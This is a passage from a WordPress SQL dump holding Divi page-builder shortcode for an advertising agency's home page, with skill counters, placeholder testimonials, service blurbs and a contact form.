90%\r[/et_pb_counter][et_pb_counter percent=\"77\" _builder_version=\"3.0.83\" title_font=\"||||||||\" percent_font=\"||||\" background_color=\"#ececee\" custom_margin=\"||35px|\" custom_padding=\"|||\" background_enable_color_default=\"on\" parallax_default=\"off\" parallax_method_default=\"on\" bar_background_color_default=\"#fcd21d\" use_percentages=\"off\" allow_player_pause_default=\"off\"]UX Research - 77%\r[/et_pb_counter][et_pb_counter percent=\"85%\" _builder_version=\"3.0.83\" title_font=\"||||||||\" percent_font=\"||||\" background_color=\"#ececee\" custom_margin=\"||35px|\" custom_padding=\"|||\" background_enable_color_default=\"on\" parallax_default=\"off\" parallax_method_default=\"on\" bar_background_color_default=\"#fcd21d\" use_percentages=\"off\" allow_player_pause_default=\"off\"]Interface Design - 85%\r[/et_pb_counter][/et_pb_counters][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Gradient Background Color Section\" _builder_version=\"3.22\" background_color_gradient_direction=\"90deg\" background_image=\"https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/08/background-split-03-1.jpg\" custom_margin=\"||78px|\" custom_margin_tablet=\"||0px|\" custom_margin_phone=\"\" custom_margin_last_edited=\"on|phone\" custom_padding=\"10%||0px|\"][et_pb_row _builder_version=\"3.25\" custom_padding=\"0px|0px|0px|0px\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_image src=\"https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/07/MB-purefront-02.png\" align_tablet=\"center\" align_phone=\"\" align_last_edited=\"on|desktop\" _builder_version=\"3.23\" custom_margin=\"||-56px|\" custom_margin_tablet=\"||10%|\" custom_margin_phone=\"\" custom_margin_last_edited=\"on|phone\" custom_padding=\"|||\" animation_style=\"slide\" animation_direction=\"left\" animation_duration=\"1500ms\" animation_intensity_slide=\"10%\" animation_starting_opacity=\"100%\" locked=\"off\"][/et_pb_image][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Quote Section\" _builder_version=\"3.22\" custom_margin=\"40px||50px|\"][et_pb_row admin_label=\"Quote\" _builder_version=\"3.25\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Quote\" _builder_version=\"3.27.4\" text_text_color=\"#747d88\" text_font_size=\"24px\" text_line_height=\"1.8em\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" animation_style=\"flip\" animation_direction=\"top\" animation_intensity_flip=\"20%\"]Lorem Ipsum is simply dummy text of the printing and typesetting industry. Lorem Ipsum has been the industry\'s standard dummy text ever.\r[/et_pb_text][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" make_equal=\"on\" use_custom_gutter=\"on\" gutter_width=\"1\" specialty=\"on\" padding_top_1=\"140px\" padding_top_2=\"0px\" padding_left_1=\"10%\" admin_label=\"Feature Section\" module_class=\" et_pb_specialty_fullwidth\" _builder_version=\"3.22\" background_color=\"#f7f7f7\" inner_width=\"100%\" inner_width_tablet=\"100%\" inner_width_phone=\"\" inner_width_last_edited=\"on|desktop\" inner_max_width=\"100%\" inner_max_width_tablet=\"100%\" inner_max_width_phone=\"\" inner_max_width_last_edited=\"on|desktop\" custom_margin=\"|||\" custom_padding=\"0px|||\" box_shadow_style=\"preset7\" box_shadow_horizontal=\"0px\" box_shadow_vertical=\"100px\" box_shadow_color=\"#ffffff\" make_fullwidth=\"on\"][et_pb_column type=\"1_2\" specialty_columns=\"2\" _builder_version=\"3.25\" custom_padding=\"|||\" padding_left__hover=\"10%\" padding_top__hover=\"140px\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_row_inner use_custom_gutter=\"on\" make_equal=\"on\" admin_label=\"Feature Titile\" _builder_version=\"3.25\" max_width=\"75%\" custom_margin=\"|||\" custom_padding=\"||10px|\"][et_pb_column_inner saved_specialty_column_type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Title\" _builder_version=\"3.27.4\" text_font=\"Montserrat||||||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.9em\" header_font=\"||||||||\" header_text_align=\"left\" header_2_font=\"Montserrat|700||on|||||\" header_2_font_size=\"42px\" header_2_line_height=\"1.3em\" max_width=\"700px\" module_alignment=\"left\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"4%\" locked=\"off\"]<h2>Award winning Design</h2>[/et_pb_text][et_pb_text admin_label=\"Subtitle\" _builder_version=\"3.27.4\" text_font=\"Montserrat||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_font=\"||||||||\" max_width=\"700px\" module_alignment=\"left\" custom_margin=\"|||\" custom_padding=\"||20px|\" animation_style=\"slide\" animation_direction=\"bottom\" animation_delay=\"100ms\" animation_intensity_slide=\"4%\" locked=\"off\"]<p><span>Lorem ipsum dolor sit amet, consectetur adipiscing elit. Maecenas metus sapien, tempus nec lectus vitae, varius porttitor turpis. Ut sit amet tincidunt nulla, nec ultrices est. Aliquam sollicitudin tempor dui, ac accumsan metus vulputate sit amet. Donec placerat rutrum tellus et.</span></p>[/et_pb_text][/et_pb_column_inner][/et_pb_row_inner][et_pb_row_inner column_structure=\"1_2,1_2\" use_custom_gutter=\"on\" make_equal=\"on\" admin_label=\"Features\" _builder_version=\"3.25\" max_width=\"75%\" custom_margin=\"|||\" custom_padding=\"|||\"][et_pb_column_inner type=\"1_2\" saved_specialty_column_type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"Product\" use_icon=\"on\" font_icon=\"%%65%%\" icon_color=\"#fcd21d\" use_icon_font_size=\"on\" icon_font_size=\"48px\" _builder_version=\"3.0.83\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" animation_style=\"fade\" animation_direction=\"bottom\"][/et_pb_blurb][/et_pb_column_inner][et_pb_column_inner type=\"1_2\" saved_specialty_column_type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"Branding\" use_icon=\"on\" font_icon=\"%%369%%\" icon_color=\"#fcd21d\" use_icon_font_size=\"on\" icon_font_size=\"48px\" _builder_version=\"3.0.82\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"20%\"][/et_pb_blurb][/et_pb_column_inner][/et_pb_row_inner][/et_pb_column][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" padding_top__hover=\"0px\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_image src=\"https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/07/home-office-06.jpg\" force_fullwidth=\"on\" align_tablet=\"center\" align_phone=\"\" align_last_edited=\"on|desktop\" _builder_version=\"3.23\" custom_margin=\"|||\" custom_padding=\"|||\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"6%\" animation_starting_opacity=\"100%\"][/et_pb_image][/et_pb_column][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Testimonial Section\" _builder_version=\"3.22\" custom_margin=\"|||\" custom_padding=\"110px||110px|\"][et_pb_row admin_label=\"Testimonial Title\" _builder_version=\"3.25\" custom_margin=\"|||\" animation_style=\"fade\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text _builder_version=\"3.27.4\" text_font=\"Montserrat|on||on|\" text_text_color=\"#353740\" text_font_size=\"42px\" text_line_height=\"1.2em\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\"]<p>From Our Clients</p>[/et_pb_text][et_pb_text admin_label=\"Subtitle\" _builder_version=\"3.27.4\" text_font=\"Montserrat||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.8em\" text_orientation=\"center\" max_width=\"600px\" module_alignment=\"center\" custom_margin=\"|||\"]Excepteur sint occaecat cupidatat non proident, sunt in culpa qui officia deserunt mollit laborum. Sed ut perspiciatis unde omnis.\r[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row column_structure=\"1_2,1_2\" admin_label=\"Testimonial\" _builder_version=\"3.25\" custom_padding=\"|||\"][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_testimonial author=\"Mitch Skolnik\" job_title=\"operation Director\" company_name=\"Elegant Themes\" portrait_url=\"https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/07/portraits-circle-small_1.png\" quote_icon=\"off\" _builder_version=\"3.2\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" use_background_color=\"off\" animation_style=\"slide\" animation_direction=\"left\" animation_intensity_slide=\"20%\"]“There are many variations of passages of Lorem Ipsum available, but the majority have suffered alteration by injected humour.”\r[/et_pb_testimonial][et_pb_testimonial author=\"Andrel Nahaev\" job_title=\"operation Director\" company_name=\"Elegant Themes\" portrait_url=\"https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/07/portraits-circle-small_3.png\" quote_icon=\"off\" _builder_version=\"3.2\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" use_background_color=\"off\" animation_style=\"slide\" animation_direction=\"left\" animation_intensity_slide=\"20%\"]“There are many variations of passages of Lorem Ipsum available, but the majority have suffered alteration by injected humour.”\r[/et_pb_testimonial][/et_pb_column][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_testimonial author=\"Eduard Ungureanu\" job_title=\"Tech Support\" company_name=\"Elegant Themes\" portrait_url=\"https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/07/portraits-circle-small_2.png\" quote_icon=\"off\" _builder_version=\"3.2\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" use_background_color=\"off\" animation_style=\"slide\" animation_direction=\"right\" animation_intensity_slide=\"20%\"]“There are many variations of passages of Lorem Ipsum available, but the majority have suffered alteration by injected humour.”\r[/et_pb_testimonial][et_pb_testimonial author=\"Tom Ewer\" job_title=\"Blogger\" company_name=\"Elegant Themes\" portrait_url=\"https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/07/portraits-circle-small_5.png\" quote_icon=\"off\" _builder_version=\"3.2\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" use_background_color=\"off\" animation_style=\"slide\" animation_direction=\"right\" animation_intensity_slide=\"20%\"]“There are many variations of passages of Lorem Ipsum available, but the majority have suffered alteration by injected humour.”\r[/et_pb_testimonial][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Contact Form Section\" _builder_version=\"3.22\" background_color=\"#fcd21d\" custom_padding=\"110px||110px|\" animation_style=\"zoom\" animation_direction=\"bottom\" animation_intensity_zoom=\"10%\" saved_tabs=\"all\"][et_pb_row admin_label=\"Service Section Title\" _builder_version=\"3.25\" custom_margin=\"||40px|\" animation_style=\"fade\" animation_direction=\"top\" locked=\"off\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Title\" _builder_version=\"3.27.4\" text_font=\"Montserrat||||||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.9em\" header_font=\"||||||||\" header_2_font=\"Montserrat|700||on|||||\" header_2_font_size=\"42px\" header_2_line_height=\"1.3em\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"4%\"]<h2>Let\'s Start Something new<br /><span style=\"color: #FFF;\">Say Hello!</span></h2>\r[/et_pb_text][et_pb_text admin_label=\"Subtitle\" _builder_version=\"3.27.4\" text_font=\"Montserrat||||\" text_text_color=\"#353740\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_font=\"||||||||\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" custom_margin=\"|||\" animation_style=\"slide\" animation_direction=\"bottom\" animation_delay=\"100ms\" animation_intensity_slide=\"4%\"]<p>Excepteur sint occaecat cupidatat non proident, sunt in culpa qui officia deserunt mollit laborum. Sed ut perspiciatis unde omnis.</p>\r[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row admin_label=\"Contact Form\" _builder_version=\"3.25\" animation_style=\"fade\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_contact_form captcha=\"off\" submit_button_text=\"Send\" module_id=\"et_pb_contact_form_0\" _builder_version=\"3.23\" form_field_background_color=\"rgba(255,255,255,0)\" form_field_text_color=\"#353740\" form_field_font=\"Montserrat||||\" form_field_font_size=\"16px\" custom_button=\"on\" button_text_color=\"#ffffff\" button_border_width=\"5px\" button_border_color=\"#ffffff\" button_border_radius=\"100px\" button_letter_spacing=\"2px\" button_font=\"Montserrat|on||on|\" button_icon=\"%%36%%\" button_icon_color=\"#ffffff\" max_width=\"800px\" module_alignment=\"center\" animation_style=\"fade\" box_shadow_style=\"preset7\" box_shadow_horizontal=\"0px\" box_shadow_vertical=\"-1px\" box_shadow_color=\"rgba(0,0,0,0.18)\" form_background_color=\"rgba(255,255,255,0)\" button_text_color_hover=\"#ffffff\" button_bg_color_hover=\"rgba(0,0,0,0)\" button_border_color_hover=\"#ffffff\" button_letter_spacing_hover=\"2px\"][et_pb_contact_field field_id=\"Name\" field_title=\"Name\" fullwidth_field=\"on\" _builder_version=\"3.16\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"off\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"off\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"off\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"off\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\"][/et_pb_contact_field][et_pb_contact_field field_id=\"Email\" field_title=\"Email Address\" field_type=\"email\" fullwidth_field=\"on\" _builder_version=\"3.16\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"off\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"off\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"off\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"off\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\"][/et_pb_contact_field][et_pb_contact_field field_id=\"Company\" field_title=\"Company Name\" fullwidth_field=\"on\" _builder_version=\"3.16\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"off\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"off\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"off\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"off\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\"][/et_pb_contact_field][et_pb_contact_field field_id=\"Message\" field_title=\"Message\" field_type=\"text\" fullwidth_field=\"on\" _builder_version=\"3.16\" custom_margin=\"||60px|\" custom_padding=\"|||\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"off\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"off\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"off\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"off\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\"][/et_pb_contact_field][/et_pb_contact_form][/et_pb_column][/et_pb_row][/et_pb_section]','Home New','','inherit','closed','closed','','564-revision-v1','','','2020-08-07 20:02:05','2020-08-07 20:02:05','',564,'https://wthtest1.in8.cdn-alpha.com/2020/08/07/564-revision-v1/',0,'revision','',0),(582,1,'2020-08-07 20:02:44','2020-08-07 20:02:44','[et_pb_section fb_built=\"1\" admin_label=\"Hero\" _builder_version=\"3.22\" custom_padding=\"0px|0px|0px|0px\" animation_style=\"zoom\" animation_intensity_zoom=\"4%\" hover_enabled=\"0\"][et_pb_row use_custom_gutter=\"on\" gutter_width=\"1\" make_equal=\"on\" module_class=\" et_pb_row_fullwidth\" _builder_version=\"4.5.2\" background_color=\"#fcd21d\" background_image=\"https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/08/banner.jpg\" width=\"100%\" width_tablet=\"100%\" width_phone=\"\" width_last_edited=\"on|desktop\" max_width=\"100%\" max_width_tablet=\"100%\" max_width_phone=\"\" max_width_last_edited=\"on|desktop\" custom_padding=\"0px||0px|\" animation_style=\"slide\" animation_direction=\"top\" animation_intensity_slide=\"3%\" hover_enabled=\"0\" make_fullwidth=\"on\" alt=\"Main Banner WhatTheHell?\" title_text=\"main banner \"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"10%|8%|10%|8%\" custom_padding__hover=\"|||\"][et_pb_text content_tablet=\"\" content_phone=\"<h1 style=%22text-align: center;%22><span style=%22color: #ffffff;%22>Welcome to</span><br /> <span style=%22color: #ffffff;%22> Advertising</span></h1>\n\" content_last_edited=\"on|phone\" _builder_version=\"4.4.9\" text_font=\"||||||||\" text_font_size=\"18px\" header_font=\"Montserrat|700||on|||||\" header_text_color=\"#f7f7f7\" header_font_size=\"76px\" header_line_height=\"1.3em\" custom_margin=\"6px||40px|||\" animation_style=\"zoom\" animation_duration=\"1200ms\" text_font_tablet=\"\" text_font_phone=\"\" text_font_last_edited=\"on|phone\" text_font_size_tablet=\"\" text_font_size_phone=\"12px\" text_font_size_last_edited=\"on|phone\" header_font_size_tablet=\"64px\" header_font_size_phone=\"40px\" header_font_size_last_edited=\"on|phone\" text_text_shadow_style=\"preset1\" global_module=\"569\" locked=\"off\"]<h1 style=\"text-align: center;\"><span style=\"color: #ffffff;\">Welcome to</span><br /> <span style=\"color: #ffffff;\"> Advertising</span></h1>\n[/et_pb_text][et_pb_button button_text=\"Learn More\" _builder_version=\"4.5.2\" custom_button=\"on\" button_text_color=\"#ffffff\" button_border_width=\"4px\" button_border_color=\"#ffffff\" button_border_radius=\"100px\" button_letter_spacing=\"2px\" button_font=\"Montserrat|on||on|\" button_icon=\"%%36%%\" animation_style=\"fade\" hover_enabled=\"0\" button_text_color_hover=\"#ffffff\" button_border_color_hover=\"#ffffff\" button_letter_spacing_hover=\"2px\" button_bg_color_hover=\"rgba(0,0,0,0)\" locked=\"off\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"on\" button_text_color__hover=\"#ffffff\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"on\" button_border_color__hover=\"#ffffff\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"on\" button_letter_spacing__hover=\"2px\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"on\" button_bg_color__hover=\"rgba(0,0,0,0)\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\" button_alignment=\"center\"][/et_pb_button][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Service Section\" _builder_version=\"3.22\" custom_margin=\"|||\" custom_padding=\"110px||110px|\"][et_pb_row admin_label=\"Service Section Title\" _builder_version=\"3.25\" custom_margin=\"||40px|\" animation_style=\"fade\" animation_direction=\"top\" saved_tabs=\"all\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Title\" _builder_version=\"3.27.4\" text_font=\"Montserrat||||||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.9em\" header_font=\"||||||||\" header_2_font=\"Montserrat|700||on|||||\" header_2_font_size=\"42px\" header_2_line_height=\"1.3em\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"4%\"]<h2>What we do</h2>[/et_pb_text][et_pb_text admin_label=\"Subtitle\" _builder_version=\"4.5.2\" text_font=\"Montserrat||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_font=\"||||||||\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" custom_margin=\"|||\" animation_style=\"slide\" animation_direction=\"bottom\" animation_delay=\"100ms\" animation_intensity_slide=\"4%\" hover_enabled=\"0\"]<p><span>WhatTheHell? is not some advertising, digital and design agency. An irreverent ideas farm seems more like it.</span></p>\n[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row column_structure=\"1_3,1_3,1_3\" use_custom_gutter=\"on\" gutter_width=\"2\" make_equal=\"on\" admin_label=\"Services\" _builder_version=\"3.25\" max_width=\"80%\" custom_padding=\"25px||25px|\" use_custom_width=\"on\" width_unit=\"off\"][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"Creative\" use_icon=\"on\" font_icon=\"%%74%%\" icon_color=\"#d4b068\" use_icon_font_size=\"on\" icon_font_size=\"60px\" _builder_version=\"4.5.2\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" custom_padding=\"30px|30px|30px|30px\" animation_style=\"zoom\" hover_enabled=\"0\" border_width_all=\"0px\" border_color_all=\"#dddddd\" border_style_all=\"solid\" use_border_color=\"on\" border_color=\"#dddddd\"]<p><span>It is important for the creative process and our lives. A key component of visual marketing to let businesses succeed.</span></p>\n[/et_pb_blurb][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"Media\" use_icon=\"on\" font_icon=\"%%103%%\" icon_color=\"#d4b068\" use_icon_font_size=\"on\" icon_font_size=\"60px\" _builder_version=\"4.5.2\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" custom_padding=\"30px|30px|30px|30px\" animation_style=\"zoom\" animation_delay=\"100ms\" hover_enabled=\"0\" border_width_all=\"0px\" border_color_all=\"#dddddd\" border_style_all=\"solid\" use_border_color=\"on\" border_color=\"#dddddd\"]<p><span>Strategically using new age media and creating a media mix effectively to evolve a sales funnel or brand awareness to engagement.</span></p>\n[/et_pb_blurb][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"Digital\" use_icon=\"on\" font_icon=\"%%107%%\" icon_color=\"#d4b068\" use_icon_font_size=\"on\" icon_font_size=\"60px\" _builder_version=\"4.5.2\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" custom_padding=\"30px|30px|30px|30px\" animation_style=\"zoom\" animation_delay=\"200ms\" hover_enabled=\"0\" border_width_all=\"0px\" border_color_all=\"#dddddd\" border_style_all=\"solid\" use_border_color=\"on\" border_color=\"#dddddd\"]<p><span>Digital has emerged as one of the efficient media, there is no spill over with the help of professional targeting &amp; even individual targeting is possible.</span></p>\n[/et_pb_blurb][/et_pb_column][/et_pb_row][et_pb_row column_structure=\"1_3,1_3,1_3\" use_custom_gutter=\"on\" gutter_width=\"2\" make_equal=\"on\" admin_label=\"Services\" _builder_version=\"3.25\" max_width=\"80%\" custom_padding=\"25px||25px|\" use_custom_width=\"on\" width_unit=\"off\"][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"Business Strategy\" use_icon=\"on\" font_icon=\"%%101%%\" icon_color=\"#d4b068\" use_icon_font_size=\"on\" icon_font_size=\"60px\" _builder_version=\"4.5.2\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" custom_padding=\"30px|30px|30px|30px\" animation_style=\"zoom\" hover_enabled=\"0\" border_width_all=\"0px\" border_color_all=\"#dddddd\" border_style_all=\"solid\" use_border_color=\"on\" border_color=\"#dddddd\"]<p><span>Gaining the competitive edge with Integrated Marketing Communications (IMC) or building product marketing strategy / Go to market strategy, We are in.</span></p>\n[/et_pb_blurb][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"Web Design\" use_icon=\"on\" font_icon=\"%%106%%\" icon_color=\"#d4b068\" use_icon_font_size=\"on\" icon_font_size=\"60px\" _builder_version=\"4.5.2\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" custom_padding=\"30px|30px|30px|30px\" animation_style=\"zoom\" animation_delay=\"100ms\" hover_enabled=\"0\" border_width_all=\"0px\" border_color_all=\"#dddddd\" border_style_all=\"solid\" use_border_color=\"on\" border_color=\"#dddddd\"]<p>Online presence of any brand/product/service starts with a well defined and clearly communicated website. Website is the key and elementry step for any advertising campaign. So be ready to a bolder start.</p>\n[/et_pb_blurb][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"Design/Video/Photo\" use_icon=\"on\" font_icon=\"%%108%%\" icon_color=\"#d4b068\" use_icon_font_size=\"on\" icon_font_size=\"60px\" _builder_version=\"4.5.2\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" custom_padding=\"30px|30px|30px|30px\" 